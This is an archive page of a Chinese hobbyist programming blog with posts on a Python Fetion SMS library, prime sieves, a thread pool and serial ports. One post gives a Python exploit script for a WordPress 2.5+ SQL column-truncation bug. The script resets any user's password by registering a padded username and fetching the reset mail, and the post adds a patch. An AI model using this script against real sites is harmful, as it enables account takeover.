可可熊的窝

Category Archives: Python

最近用Python写了个Fetion的库

IN:Python, 编程相关   Tags: , ,    Comments:17

上周大部分的时间在写这个东西,现在基本上实现了我所需要的功能,网上有一些Fetion的实现,不过都比较凑合,也有一个叫LibFetion的东西,不过不开放源代码,所以就自己写了这个PyFetion的库。

目前这个库有以下功能

  • 支持飞信2006,2008协议(其实就是分别使用MD5、SHA1算法进行登录认证);
  • 支持HTTP、TCP方式;
  • 支持给自己手机发短信(这个也是我的主要目的);
  • 支持直接发送信息到指定手机号(前提是加为好友,好处是直接使用手机号,而不需要知道飞信号);
  • 支持添加好友
  • …….
  • 在设计好整个框架以后,再有一些功能添加进来也就比较方便了

    特点

  • 纯Python代码,可以运行到任何地方,只要有Python的地方就有fetion;
  • 封装程度比较高,使用方便;
  • 好的,吹完了。本来还想把这个写成一个完整的飞信客户端,但是觉得没什么必要,已经有Pidgin自带的飞信插件,还有个不开源的LibFetion我再写一个就没什么意义了,而且我这个PyFetion的定位本来也不是做完整的客户端。何况写GUI的程序我想把界面做得漂亮些,我现在也没什么做GUI的经验,wxPython也用的不熟。我还有个想法就是用SDL(Pygame)之类的做一个很炫的客户端,不过这肯定得花不少的时间,最近公司可能要开始忙了,这些还是先放一放吧。

    刚公司开了两个多小时会,这会儿都下班好久了,今天就到此结束吧。

    12-03
    2008

    筛选法求质数

    IN:C, Python, 编程相关   Tags: ,    Comments:8

    这里看到用Lua和Python写的使用筛选法求质数的代码,俺自己也写了写,Python版用到了上面链接中一位兄弟的tips :-)

    先来C语言版的:

    #include <stdio .h>
    #include <math .h>
    
    #define NUM 2000000
    
    int main(void)
    {
        int primes[NUM];
        int i,j;
        for (i=0;i<num ;i++) {
            primes[i] = 1;
    
        }
        primes[0] = 0;
        primes[1] = 0;
        for (i=1;i<(long)sqrt(NUM)+1;i++) {
            if (primes[i]) {
                for (j=pow(i,2);j<NUM;j+=i) {
                    primes[j] = 0;
                }
            }
        }
    
        long sum = 0;
        for (i=0;i<NUM;i++) {
            if (primes[i]) sum+=i;
        }
        printf("%ld\n",sum);
    
        return 0;
    }
    

    计算两百万以内质数和大约0.1秒左右:

    [cocobear@cocobear wxpython]$ time ./a.out
    142913828922
    
    real	0m0.100s
    user	0m0.088s
    sys	0m0.012s
    

    接着来可爱的Python版:

    from math import sqrt
    NUM = 2000000
    prime_num = [i for i in xrange(NUM+1)]
    for i in xrange(2,int(sqrt(NUM))+1):
        if prime_num[i]:
            start = i**2
            step  = i
            prime_num[start::step] = ( (NUM - start)/step + 1)*[0]
    print sum(prime_num)-1
    

    执行时间1秒多点:

    [cocobear@cocobear wxpython]$ time python prime.py
    142913828922
    
    real	0m1.204s
    user	0m1.051s
    sys	0m0.093s
    

    Python不到10行的代码也有不错的效率:-)
    以上测试平台为:

    Fedora 9 AMD64 4600+ 4G

    计算5的阶乘

    Python实现线程池

    IN:Python, 编程相关   Tags:    Comments:5

    前言:
    关于线程池(thread pool)的概念请参考http://en.wikipedia.org/wiki/Thread_pool_pattern。在Python中使用线程是有硬伤的,因为Python(这里指C语言实现的Python)的基本调用都最后生成对应C语言的函数调用,因此Python中使用线程的开销太大,不过可以使用Stackless Python(Python的一个修改版)来增强Python中使用线程的表现。
    同时由于Python中GIL的存在,导制在使用多CPU时Python无法充分利用多个CPU,目前pysco这个模块可以针对多CPU提高Python的效率。

    在C语言里要实现个线程池,就要面对一堆的指针,还有pthread这个库中那些看起来很让人头痛的一些函数:
    int pthread_create(pthread_t *restrict thread,
    const pthread_attr_t *restrict attr,
    void *(*start_routine)(void*), void *restrict arg);
    而如果用Python来实现一个线程池的话就好多了,不仅结构十分清晰,而且代码看起来会很优美:

    import  threading
    from  time  import  sleep 
    
    class  ThreadPool: 
    
         """Flexible  thread  pool  class.   Creates  a  pool  of  threads,  then
         accepts  tasks  that  will  be  dispatched  to  the  next  available
         thread.""" 
    
         def  __init__(self,  numThreads): 
    
             """Initialize  the  thread  pool  with  numThreads  workers.""" 
    
             self.__threads  =  []
             self.__resizeLock  =  threading.Condition(threading.Lock())
             self.__taskLock  =  threading.Condition(threading.Lock())
             self.__tasks  =  []
             self.__isJoining  =  False
             self.setThreadCount(numThreads) 
    
         def  setThreadCount(self,  newNumThreads): 
    
             """  External  method  to  set  the  current  pool  size.   Acquires
             the  resizing  lock,  then  calls  the  internal  version  to  do  real
             work.""" 
    
             #  Can't  change  the  thread  count  if  we're  shutting  down  the  pool!
             if  self.__isJoining:
                 return  False 
    
             self.__resizeLock.acquire()
             try:
                 self.__setThreadCountNolock(newNumThreads)
             finally:
                 self.__resizeLock.release()
             return  True 
    
         def  __setThreadCountNolock(self,  newNumThreads): 
    
             """Set  the  current  pool  size,  spawning  or  terminating  threads
             if  necessary.   Internal  use  only;  assumes  the  resizing  lock  is
             held.""" 
    
             #  If  we  need  to  grow  the  pool,  do  so
             while  newNumThreads  >  len(self.__threads):
                 newThread  =  ThreadPoolThread(self)
                 self.__threads.append(newThread)
                 newThread.start()
             #  If  we  need  to  shrink  the  pool,  do  so
             while  newNumThreads  < len(self.__threads):
                 self.__threads[0].goAway()
                 del  self.__threads[0] 
    
         def  getThreadCount(self): 
    
             """Return  the  number  of  threads  in  the  pool.""" 
    
             self.__resizeLock.acquire()
             try:
                 return  len(self.__threads)
             finally:
                 self.__resizeLock.release() 
    
         def  queueTask(self,  task,  args=None,  taskCallback=None): 
    
             """Insert  a  task  into  the  queue.   task  must  be  callable;
             args  and  taskCallback  can  be  None.""" 
    
             if  self.__isJoining  ==  True:
                 return  False
             if  not  callable(task):
                 return  False 
    
             self.__taskLock.acquire()
             try:
                 self.__tasks.append((task,  args,  taskCallback))
                 return  True
             finally:
                 self.__taskLock.release() 
    
         def  getNextTask(self): 
    
             """  Retrieve  the  next  task  from  the  task  queue.   For  use
             only  by  ThreadPoolThread  objects  contained  in  the  pool.""" 
    
             self.__taskLock.acquire()
             try:
                 if  self.__tasks  ==  []:
                     return  (None,  None,  None)
                 else:
                     return  self.__tasks.pop(0)
             finally:
                 self.__taskLock.release() 
    
         def  joinAll(self,  waitForTasks  =  True,  waitForThreads  =  True): 
    
             """  Clear  the  task  queue  and  terminate  all  pooled  threads,
             optionally  allowing  the  tasks  and  threads  to  finish.""" 
    
             #  Mark  the  pool  as  joining  to  prevent  any  more  task  queueing
             self.__isJoining  =  True 
    
             #  Wait  for  tasks  to  finish
             if  waitForTasks:
                 while  self.__tasks  !=  []:
                     sleep(.1) 
    
             #  Tell  all  the  threads  to  quit
             self.__resizeLock.acquire()
             try:
                 self.__setThreadCountNolock(0)
                 self.__isJoining  =  True 
    
                 #  Wait  until  all  threads  have  exited
                 if  waitForThreads:
                     for  t  in  self.__threads:
                         t.join()
                         del  t 
    
                 #  Reset  the  pool  for  potential  reuse
                 self.__isJoining  =  False
             finally:
                 self.__resizeLock.release() 
    
    class  ThreadPoolThread(threading.Thread):
          """  Pooled  thread  class.  """ 
    
         threadSleepTime  =  0.1 
    
         def  __init__(self,  pool): 
    
             """  Initialize  the  thread  and  remember  the  pool.  """ 
    
             threading.Thread.__init__(self)
             self.__pool  =  pool
             self.__isDying  =  False 
    
         def  run(self): 
    
             """  Until  told  to  quit,  retrieve  the  next  task  and  execute
             it,  calling  the  callback  if  any.   """ 
    
             while  self.__isDying  ==  False:
                 cmd,  args,  callback  =  self.__pool.getNextTask()
                 #  If  there's  nothing  to  do,  just  sleep  a  bit
                 if  cmd  is  None:
                     sleep(ThreadPoolThread.threadSleepTime)
                 elif  callback  is  None:
                     cmd(args)
                 else:
                     callback(cmd(args)) 
    
         def  goAway(self): 
    
             """  Exit  the  run  loop  next  time  through.""" 
    
             self.__isDying  =  True
     

    这段100多行的代码完成了一个可动态改变的线程池,并且包含了详细的注释,这里是代码的出处。我觉得这段代码比Python官方给出的那个还要好些。他们实现的原理都是一样的,使用了一个队列(Queue)来存储任务。

    关于Python中线程同步的问题,这里有不错的介绍。

    09-28
    2008

    wordpress漏洞利用-更改任意用户的密码

    IN:Python, 编程相关   Tags: , ,    Comments:6

    最近wordpress又出现了一个漏洞,详细描述见这里:http://milw0rm.com/exploits/6397,关于漏洞的形成原因这里:http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/有很好的描述,主要原因是由于wordpress对用户名的检查不足,使得过长的用户名可以注册,从而产生这个问题。

    贴一下我写的利用工具,针对2.5及以上版本,可以更改(这里用重置更恰当)任意用户的密码,当然前提是这个wordpress开放了注册:

    #!/usr/bin/env python
    #coding=utf-8
    #author: cocobear.cn@gmail.com
    #website:http://cocobear.info
    
    """ exploit description:
    
    http://milw0rm.com/exploits/6397
    
        influencing:
            wordpress 2.5 and above
        This short code can change any user's password.
    """
    
    import urllib,cookelib,urllib2,httplib
    import sys
    import poplib
    
    #all you need to do is change this two lines:
    base_url = "http://cocobear.info/blog/"
    hack_user= "cocobear"
    
    def init():
        cookie = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
    
        exheaders = [("User-Agent","Opera/9.27 (X11; Linux x86_64; U; en)"),("Connection","Keep-Alive"),("Referer","http://zzfw.sn.chinamobile.com"),("Accept","text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"),("Accept-Charset","iso-8859-1, utf-8, utf-16, *;q=0.1"),("Cookie2","$Version=1"),]
    
        opener.addheaders = exheaders
        urllib2.install_opener(opener)
        return opener
    
    def register(opener):
        global base_url,hack_user,hack_mail
    
        #register a hack user
        num = 60 - len(hack_user)
        hack_user = hack_user + " "*num + "x"
        body = (("user_login",hack_user),("user_email",hack_mail),)
        ret  = opener.open(base_url+"action=register",urllib.urlencode(body))
        print ret.read()
        exit()
    
    def change_passwd(opener):
        global base_url,hack_mail,hack_pass
    
        body = (("user_login",hack_mail),)
        print body
        ret  = opener.open(base_url+"action=lostpassword",urllib.urlencode(body))
    
        print ret.read()
    
        #get confirm mail
        pop = poplib.POP3('pop.sina.com')
        pop.user(hack_mail)
        pop.pass_(hack_pass)
        count = pop.stat()[0]
        try:
            data = pop.retr(count)[1]
        except poplib.error_proto:
            print 'get mail error'
            return -1
    
        for l in data:
            if l.startswith(base_url):
                confirm_url = l
                print "Successful!"
    
        #visit confirm mail
        ret = opener.open(confirm_url)
        #print ret.read()
    
    def main(argv=None):
        opener=init()
        register(opener)
        change_passwd(opener)
    
    hack_mail= "wordpress_sql@sina.com"
    hack_pass= "1234566"
    
    base_url+= "wp-login.php?"
    
    if __name__ == "__main__":
        sys.exit(main())
    

    大家不用试我的博客了,我自己打补丁了:

    function validate_username( $username ) {
           /* if (strlen($username) > 60) {
                    return False;
            }
           */
            $sanitized = sanitize_user( $username, true );
            $valid = ( $sanitized == $username );
            return apply_filters( 'validate_username', $valid, $username );
    }
    

    修改wp-includes/registration.php文件中的validate_username函数,注释部分是我添加的。

    09-09
    2008

    关于串口互联的问题

    IN:Python, 编程相关   Tags: ,    Comments:3

    先来段插曲:

    Python中有pyserial这个模块可以进行串口操作,今天试一下但发现写个最简单的脚本也出错:

    import serial
    
    serial = serial.Serial()
    serial.port = 1
    serial.timeout = 1
    
    serial.read(1)
    

    运行的结果是:
    serial = serial.Serial()
    AttributeError: ‘module’ object has no attribute ‘Serial’
    仔细看了看serial库中确实有Serial这个类, 但为什么会出现这样的问题,想了半天没明白,最后google得到结论,问题是“我的文件名是serial.py”,贴出老外的解释:

    Because “import serial” imports whatever thing it finds named serial,
    and it’s not finding PySerial because you have a module named
    serial.py.
    -bob

    来自

    这次记下了,再不会犯这样的错误了。

    搜pyserial相关资料的时候发现英文的很少,搜到不少cz(捷克)域名的文章,还有些de(德国)的,看不懂啊,现在发现英文资料真好,看着真舒服。(可惜那个Nginx是俄国人写的,又是一堆俄文,唉……)

    好了,插曲结束,说下正题,本来是想实现个工具可以把机器上两个串口联起来,可以省去用线把两个串口联起来,但经过试验,又仔细想了想,发现这个想法是不可能的,因为程序对串口进行操作的话必须进行打开操作,而应用程序会先打开串口,所以就无法得到串口发出的数据,即使通过钩子技术获得数据,但也不能向这个串口发送数据,所以原理上应该是无法实现的。

    08-29
    2008
    Page 5 of 8« First...34567...Last »
    loading...